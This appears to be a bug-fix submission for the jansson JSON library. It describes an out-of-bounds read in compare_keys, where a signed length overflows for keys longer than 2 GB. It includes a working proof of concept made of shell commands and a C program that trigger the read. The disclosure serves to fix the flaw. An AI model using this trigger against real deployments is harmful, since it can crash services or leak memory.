jansson
jansson copied to clipboard
Handle keys longer than 2 GB
It is possible to trigger an out of boundary read in compare_keys while dumping json with JSON_SORT_KEYS due to a signed integer usage.
If a key is longer than 2 GB then len in key_len turns negative. The code uses the smaller value for memory comparison. Since a negative int becomes a huge size_t value, the memcmp call eventually triggers an out of boundary read.
Proof of Concept:
- Create a json file with two keys, one being larger than 2 GB:
echo -n '{"' > header.json dd if=/dev/zero bs=1024 count=2097153 | tr '\0' 'a' > poc.json dd if=header.json of=poc.json conv=notrunc echo -n '":"a","a":""}' >> poc.json
- Compile and run this proof of concept code:
#include <jansson.h>
#include <unistd.h>
int main(void) {
json_error_t error;
json_t *json;
if ((json = json_load_file("poc.json", 0, &error)) == NULL)
return 1;
if (json_dump_file(json, "/dev/null", JSON_SORT_KEYS))
return 1;
return 0;
}
Without this patch, an out of boundary read occurs.
Signed-off-by: Tobias Stoeckmann [email protected]